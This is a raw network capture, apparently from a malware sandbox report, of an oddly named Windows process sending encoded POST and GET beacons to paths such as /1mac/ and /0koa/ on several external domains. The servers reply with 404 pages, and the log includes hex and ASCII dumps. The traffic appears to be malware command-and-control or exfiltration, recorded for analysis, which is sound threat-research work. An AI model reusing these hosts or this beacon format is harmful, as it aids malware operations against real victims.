                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.449770104.21.89.46801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:57.319680929 CEST649OUTPOST /1mac/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.rtpdewata4d-16.xyz
                            Origin: http://www.rtpdewata4d-16.xyz
                            Referer: http://www.rtpdewata4d-16.xyz/1mac/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 69 48 71 48 48 37 4f 69 6e 49 53 4b 54 57 7a 75 70 4e 65 51 46 57 66 47 67 2b 6e 61 50 32 4f 54 67 4d 73 75 52 54 69 4d 39 66 48 48 6b 6c 74 61 4c 6c 39 7a 6a 73 61 70 67 6e 39 4d 4d 4b 66 53 41 32 41 45 33 71 68 32 4f 58 65 45 57 6d 32 69 6e 71 36 69 57 38 47 67 62 30 65 5a 7a 47 4c 41 58 33 2f 74 59 48 41 5a 4d 63 49 49 65 56 6c 54 71 30 30 4a 72 55 66 76 46 55 6a 6d 39 4b 58 49 61 43 4c 48 34 44 2f 77 38 38 46 32 4b 42 72 75 2b 72 46 4b 66 4c 36 4a 6f 4c 67 45 65 57 34 73 7a 58 38 75 74 52 4f 55 7a 43 6b 67 79 44 45 4c 45 61 78 38 56 75 6d 76 6c 30 56 6a 71 55 69 6b 48 51 3d 3d
                            Data Ascii: UbV=iHqHH7OinISKTWzupNeQFWfGg+naP2OTgMsuRTiM9fHHkltaLl9zjsapgn9MMKfSA2AE3qh2OXeEWm2inq6iW8Ggb0eZzGLAX3/tYHAZMcIIeVlTq00JrUfvFUjm9KXIaCLH4D/w88F2KBru+rFKfL6JoLgEeW4szX8utROUzCkgyDELEax8Vumvl0VjqUikHQ==
                            Jul 16, 2024 07:23:57.956109047 CEST1236INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:57 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJCoYmK3BjF0UYVznBl%2BiE5ToopB7PPycSta6r7iXE8G7ip7WNPiEfCM3aTNKQec37I37cweaMm8b4p3Fz8jF3tf%2FIAGR4iShFkrP7Cj6LFLt4%2FxX79xovgoyKYNQSf%2BO4xBhgZmrOdJ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f902dbf841906-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                            Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
                            Jul 16, 2024 07:23:57.956134081 CEST223INData Raw: 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae 80 6c
                            Data Ascii: E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.449771104.21.89.46801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:59.862617016 CEST669OUTPOST /1mac/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.rtpdewata4d-16.xyz
                            Origin: http://www.rtpdewata4d-16.xyz
                            Referer: http://www.rtpdewata4d-16.xyz/1mac/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 69 48 71 48 48 37 4f 69 6e 49 53 4b 54 31 37 75 73 73 65 51 48 32 66 42 6c 2b 6e 61 42 57 4f 49 67 4d 67 75 52 53 6e 4a 36 73 6a 48 6c 48 31 61 4b 68 70 7a 67 73 61 70 30 58 38 47 53 36 65 2f 41 32 45 32 33 71 74 32 4f 58 4b 45 57 6e 6d 69 6e 5a 43 74 56 4d 47 69 44 45 65 62 75 32 4c 41 58 33 2f 74 59 48 55 33 4d 63 51 49 65 47 74 54 72 57 51 4b 6d 30 65 64 41 55 6a 6d 35 4b 58 4d 61 43 4c 66 34 43 54 61 38 2f 74 32 4b 45 76 75 35 36 46 4e 56 4c 36 50 73 4c 68 54 5a 6e 4e 46 36 55 78 63 6a 52 43 47 36 47 55 46 2b 6c 56 52 56 72 51 72 48 75 43 63 34 7a 63 58 6e 58 66 74 63 53 6d 39 34 6d 76 63 6d 50 64 52 65 77 32 38 33 33 58 6d 5a 6c 55 3d
                            Data Ascii: UbV=iHqHH7OinISKT17usseQH2fBl+naBWOIgMguRSnJ6sjHlH1aKhpzgsap0X8GS6e/A2E23qt2OXKEWnminZCtVMGiDEebu2LAX3/tYHU3McQIeGtTrWQKm0edAUjm5KXMaCLf4CTa8/t2KEvu56FNVL6PsLhTZnNF6UxcjRCG6GUF+lVRVrQrHuCc4zcXnXftcSm94mvcmPdRew2833XmZlU=
                            Jul 16, 2024 07:24:00.478413105 CEST1236INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:00 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B177A76T7IPVWI1sKZ%2FxOjhUmnR0Jjl3q70OPIiKib9b%2Fi%2FAgs%2B7fY66BeYkDaLsiQSyD7yw9F9YFRK54hkxEkUULKafKpcwsIqcggv8EBUPPdH6qZPA9efsRy0Bwoh4Z2pz7IVr22eK"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f903d9d29439f-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                            Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
                            Jul 16, 2024 07:24:00.478470087 CEST223INData Raw: 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae 80 6c
                            Data Ascii: E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.449772104.21.89.46801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:02.406482935 CEST10751OUTPOST /1mac/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.rtpdewata4d-16.xyz
                            Origin: http://www.rtpdewata4d-16.xyz
                            Referer: http://www.rtpdewata4d-16.xyz/1mac/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 69 48 71 48 48 37 4f 69 6e 49 53 4b 54 31 37 75 73 73 65 51 48 32 66 42 6c 2b 6e 61 42 57 4f 49 67 4d 67 75 52 53 6e 4a 36 73 72 48 6b 30 39 61 4c 44 42 7a 68 73 61 70 33 58 38 46 53 36 65 48 41 79 6f 49 33 71 77 44 4f 55 79 45 5a 67 6d 69 32 63 75 74 4f 63 47 69 4b 6b 65 61 7a 47 4c 76 58 30 48 54 59 48 45 33 4d 63 51 49 65 48 64 54 39 30 30 4b 6b 30 66 76 46 55 6a 79 39 4b 58 30 61 43 54 50 34 43 58 67 2f 50 4e 32 4b 6b 66 75 38 4a 74 4e 57 72 36 4e 70 4c 68 62 5a 6e 52 65 36 55 63 6c 6a 53 65 6f 36 42 6b 46 74 44 39 4a 46 4b 38 67 63 39 6d 79 70 43 49 72 71 58 50 55 51 6a 6d 33 33 57 33 55 30 74 56 45 52 7a 62 49 77 57 47 6b 4f 53 68 65 51 32 33 65 6e 61 57 55 5a 45 71 69 38 44 31 39 6e 6b 49 65 69 69 64 65 54 39 75 59 53 31 31 4c 55 58 30 31 6f 39 34 47 77 54 2b 74 44 35 75 4a 30 42 42 41 4b 32 35 2b 61 2f 35 42 48 7a 77 4d 2b 2f 30 6a 57 4d 44 56 32 63 61 4a 56 53 2f 4a 5a 2f 4f 72 54 67 35 74 78 32 5a 6a 51 4c 6b 5a 54 7a 32 52 37 6c 33 59 6a 7a 64 70 31 5a 69 30 2f 63 48 39 63 4e [TRUNCATED]
                            Data Ascii: UbV=iHqHH7OinISKT17usseQH2fBl+naBWOIgMguRSnJ6srHk09aLDBzhsap3X8FS6eHAyoI3qwDOUyEZgmi2cutOcGiKkeazGLvX0HTYHE3McQIeHdT900Kk0fvFUjy9KX0aCTP4CXg/PN2Kkfu8JtNWr6NpLhbZnRe6UcljSeo6BkFtD9JFK8gc9mypCIrqXPUQjm33W3U0tVERzbIwWGkOSheQ23enaWUZEqi8D19nkIeiideT9uYS11LUX01o94GwT+tD5uJ0BBAK25+a/5BHzwM+/0jWMDV2caJVS/JZ/OrTg5tx2ZjQLkZTz2R7l3Yjzdp1Zi0/cH9cNhbO8dbbI8luDt7FJFdCidhpgp7Qt0cV2JoSIjWr0+IoQ0n1v79HQsddz3svxbc8XzcNKzXC6wmhjF8YLSmPj8imzbPQQEQlvEzwlqrErk85Ut2O88wJw7jpGdfBfVfcgVP6wWCHmxj2RRwynR1Q/pdVItgIMHAlHlw5ITYMMwGpVF6HlFnrnRrKjc3S7mzyFA+PTSHrh5y5d/h1aVi7dRhHYuIHftvqRnxjfCmJm1ObTIXXE001n2jFmXWdFmSm9VzriSAi/BXW1dR2hLXYshphzkYt6THw8IMfiwk93ETaSHcQClHbO9yZAdvhoKaRI3s6gLC14vztasozUk9oP3d16Rez2YwTNRbBq3RA+tH87cShprvWPSzSdIMI1NuVUPeZUhLZ4WvtDjgoca5UV99AdFY7Gh/Q0GqWYk9tKUeveocasBk+lNoXK9xdblC8tKs1aOz2CyL1cGQGY9oNfd6vBvCIE1cRbJur2ZwsboGBqhEvFa7wa9s1HZ4RlT8WyGxVyzFkwxPlpyDF29o2a1CztgzVTXX0RIvfJtDMLHOWBbDxCGuoEBYxZWrC0pRBvNgRbaT5kv0UCZIkULKGQU+mXIc/eeGUBJ+PR1aFvjRvEKE5e2RZnrwcJ5l352Kfgr4e+JZl7zHAteO0YnAhJqnkepjfsdB2U8R [TRUNCATED]
                            Jul 16, 2024 07:24:03.037378073 CEST1236INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:02 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aN9wr7lJ29%2FUjEFpICarqZkz%2ByjmxfKov%2BrKmR31agOYSNKAh85icrVNVa5Nh8JpdDNJvxiVT9VyVhnynW%2BXCeDCnOPBHWf069Mn1EyS8mCxIMrC6%2F7JH0dHH%2Bcz0%2BtXDWDrpuIpr4v"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f904d8aec0c7a-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                            Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM
                            Jul 16, 2024 07:24:03.037401915 CEST234INData Raw: 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3
                            Data Ascii: [!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.449773104.21.89.46801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:04.954129934 CEST372OUTGET /1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.rtpdewata4d-16.xyz
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:05.570314884 CEST1236INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:05 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwfNoiDezcem3Y6PqHqhqTpcfGlo4MO9njk8RKNTeSQKBJ5y%2BcqpK25nTQ36ZpO3HvUbtqIDga65DIIQrZ0bb3sX3Orm1Ts3huRYtuWDxyuiDc3N8RlUOiBFGaYH8kinTkHpWVrPuPBg"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f905d7fed4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                            Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:
                            Jul 16, 2024 07:24:05.570398092 CEST716INData Raw: 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68
                            Data Ascii: 50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.449774172.67.196.1801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:10.610856056 CEST643OUTPOST /0koa/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.itsjojosiwas.com
                            Origin: http://www.itsjojosiwas.com
                            Referer: http://www.itsjojosiwas.com/0koa/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 72 6d 4a 54 2f 41 2f 71 64 4d 32 35 54 43 32 65 63 34 4e 61 36 68 6a 6a 34 31 68 65 65 31 55 30 77 48 59 75 2b 47 41 4a 71 6b 72 44 50 33 6f 67 64 30 56 47 4b 6c 79 74 44 68 51 69 4b 32 2b 7a 46 4b 6a 46 50 44 56 4d 74 68 36 44 56 57 6d 42 31 34 76 47 75 52 61 69 6f 71 70 34 39 37 47 49 6c 6f 6d 31 49 69 49 6a 54 39 5a 4c 49 4f 69 73 4b 47 73 49 32 35 49 4c 45 41 38 55 48 2f 68 78 6a 72 59 30 54 49 64 6b 49 4d 2f 39 33 72 67 65 71 30 6f 68 77 54 6c 2f 78 76 4a 6c 37 61 76 4d 4e 47 68 47 6d 6e 42 59 55 57 65 41 6d 71 7a 5a 61 2f 72 70 74 76 2b 5a 48 39 5a 5a 4a 2f 4e 75 6e 77 3d 3d
                            Data Ascii: UbV=rmJT/A/qdM25TC2ec4Na6hjj41hee1U0wHYu+GAJqkrDP3ogd0VGKlytDhQiK2+zFKjFPDVMth6DVWmB14vGuRaioqp497GIlom1IiIjT9ZLIOisKGsI25ILEA8UH/hxjrY0TIdkIM/93rgeq0ohwTl/xvJl7avMNGhGmnBYUWeAmqzZa/rptv+ZH9ZZJ/Nunw==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.449775172.67.196.1801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:13.159827948 CEST663OUTPOST /0koa/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.itsjojosiwas.com
                            Origin: http://www.itsjojosiwas.com
                            Referer: http://www.itsjojosiwas.com/0koa/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 72 6d 4a 54 2f 41 2f 71 64 4d 32 35 54 68 75 65 51 35 4e 61 76 78 6a 67 30 56 68 65 4d 31 55 77 77 48 55 75 2b 48 46 57 71 33 50 44 4f 57 59 67 63 31 56 47 5a 56 79 74 58 78 51 74 46 57 2f 78 46 4b 75 79 50 43 70 4d 74 6c 53 44 56 53 69 42 31 50 44 48 68 68 61 67 6e 4b 70 36 35 37 47 49 6c 6f 6d 31 49 6a 74 47 54 39 42 4c 49 37 71 73 59 6b 55 4c 31 35 49 4d 4f 67 38 55 4e 66 68 31 6a 72 59 73 54 4d 46 65 49 4a 37 39 33 71 51 65 6b 47 41 69 70 6a 6c 39 31 76 49 6e 79 36 61 2b 45 58 42 4f 6e 45 51 38 4b 57 65 77 75 4d 69 44 4c 4f 4b 2b 2f 76 61 71 61 36 51 74 45 38 77 6e 38 7a 4b 5a 46 4a 39 57 79 62 4d 30 49 6d 4e 52 42 68 55 55 4f 39 30 3d
                            Data Ascii: UbV=rmJT/A/qdM25ThueQ5Navxjg0VheM1UwwHUu+HFWq3PDOWYgc1VGZVytXxQtFW/xFKuyPCpMtlSDVSiB1PDHhhagnKp657GIlom1IjtGT9BLI7qsYkUL15IMOg8UNfh1jrYsTMFeIJ793qQekGAipjl91vIny6a+EXBOnEQ8KWewuMiDLOK+/vaqa6QtE8wn8zKZFJ9WybM0ImNRBhUUO90=
                            Jul 16, 2024 07:24:14.799103975 CEST1236INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
